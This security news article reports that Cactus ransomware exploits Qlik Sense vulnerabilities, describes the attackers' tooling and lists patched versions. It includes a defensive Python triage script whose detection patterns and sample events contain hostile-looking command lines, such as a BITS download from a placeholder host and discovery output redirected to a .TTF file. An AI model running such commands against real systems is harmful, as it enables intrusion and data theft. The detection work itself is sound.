Cactus ransomware has been exploiting critical vulnerabilities in the Qlik Sense data analytics solution to gain initial access to corporate networks.
Qlik Sense supports multiple data sources and allows users to create custom data reports or interactive visualizations that can serve in decision-making processes. The product can work both locally and in the cloud.
In late August, the vendor released security updates for two critical vulnerabilities affecting the Windows version of the platform. One of the vulnerabilities, a path traversal bug tracked as CVE-2023-41266, could be exploited to generate anonymous sessions and perform HTTP requests to unauthorized endpoints.
The second issue, tracked as CVE-2023-41265 and with a critical severity of 9.8, does not require authentication and can be leveraged to elevate privileges and execute HTTP requests on the backend server that hosts the application.
On September 20, Qlik discovered that the fix for CVE-2023-41265 was insufficient and provided a new update, tracking the issue as a separate vulnerability identified as CVE-2023-48365.
In a recent report, cybersecurity company Arctic Wolf warns of Cactus ransomware actively exploiting these flaws on publicly-exposed Qlik Sense instances that remain unpatched.
Cactus ransomware campaign
The Cactus ransomware attacks that Arctic Wolf observed exploit the security issues to execute code that causes the Qlik Sense Scheduler service to initiate new processes.
The attackers use PowerShell and the Background Intelligent Transfer Service (BITS) to download tools that establish persistence and provide remote access to the machine:
- ManageEngine UEMS executables disguised as Qlik files
- AnyDesk fetched straight from the official website
- A Plink (PuTTY Link) binary renamed to “putty.exe”
Additionally, the attackers execute multiple discovery commands with the output redirected into .TTF files, which Arctic Wolf researchers believe is for obtaining command output via path traversal.
The threat actor also used various methods to remain hidden and to gather information, such as uninstalling Sophos antivirus, changing the administrator password, and establishing an RDP tunnel using the Plink command-line connection tool.
In the final stage of the attack, the hackers deployed the Cactus ransomware on the breached systems.
Additional evidence collected by Arctic Wolf’s analysts suggests that the threat actors used RDP to move laterally, WizTree to analyze disk space, and rclone (disguised as ‘svchost.exe’) to exfiltrate data.
The use of these tools and techniques is consistent with what researchers observed in previous Cactus ransomware attacks.
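Several of the behaviours described above leave traces in process-creation telemetry: processes started by the Qlik Sense Scheduler service, BITS downloads, command output redirected into .TTF files, and an ‘svchost.exe’ running outside the Windows system directory. The following Python is an added example for triaging such events, not code from Arctic Wolf or Qlik; the event field names, the placeholder Scheduler path and the sample events are constructed assumptions.

```python
import re
from pathlib import PureWindowsPath

# Placeholder, not a real path: set to the image path of the Qlik Sense
# Scheduler service on the monitored host.
SCHEDULER_IMAGE = r"C:\PLACEHOLDER\QlikSense\SchedulerService.exe"
SVCHOST_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
# Shell output redirection (> or >>) whose target ends in .ttf
TTF_REDIRECT = re.compile(r'>>?\s*"?[^">|&]+\.ttf\b', re.IGNORECASE)
# BITS downloads via bitsadmin.exe or the Start-BitsTransfer cmdlet
BITS = re.compile(r"\bbitsadmin\b|\bStart-BitsTransfer\b", re.IGNORECASE)

def triage(event):
    """Return the reasons (possibly none) a process-creation event is suspicious."""
    image = PureWindowsPath(event["image"])
    parent = event.get("parent_image", "")
    cmd = event.get("command_line", "")
    reasons = []
    if parent.lower() == SCHEDULER_IMAGE.lower():
        reasons.append("child-of-qlik-scheduler")
    if TTF_REDIRECT.search(cmd):
        reasons.append("output-redirected-to-ttf")
    if BITS.search(cmd):
        reasons.append("bits-transfer")
    # A genuine svchost.exe runs from the Windows system directory
    if image.name.lower() == "svchost.exe" and str(image.parent).lower() not in SVCHOST_DIRS:
        reasons.append("svchost-outside-system-dir")
    return reasons

# Constructed sample events (fields modelled on process-creation logs)
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "parent_image": SCHEDULER_IMAGE,
     "command_line": r'cmd.exe /c whoami > "C:\example\out.ttf"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell Start-BitsTransfer -Source https://files.example/t.zip -Destination C:\example\t.zip"},
    {"image": r"C:\ProgramData\svchost.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "svchost.exe"},
    {"image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs"},
]

if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, triage(ev))
```

Each reason is a lead for an analyst rather than a verdict; legitimate administration also uses BITS, so the signals are most useful in combination.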
To mitigate the risks of a breach, Qlik recommends upgrading to the following versions of Sense Enterprise for Windows:
- August 2023 Patch 2
- May 2023 Patch 6
- February 2023 Patch 10
- November 2022 Patch 12
- August 2022 Patch 14
- May 2022 Patch 16
- February 2022 Patch 15
- November 2021 Patch 17
Cactus ransomware emerged in March this year and adopted the double-extortion tactic, stealing data from victims and then encrypting it on compromised systems. In past attacks, they exploited Fortinet VPN flaws for initial network access.
In a May report, researchers at Kroll set the ransomware operation apart due to its use of encryption to protect the malware binary from being detected by security products.
The researchers also highlighted the use of the AnyDesk remote desktop application, the rclone tool to send stolen data to cloud storage services, and batch scripts to uninstall security products.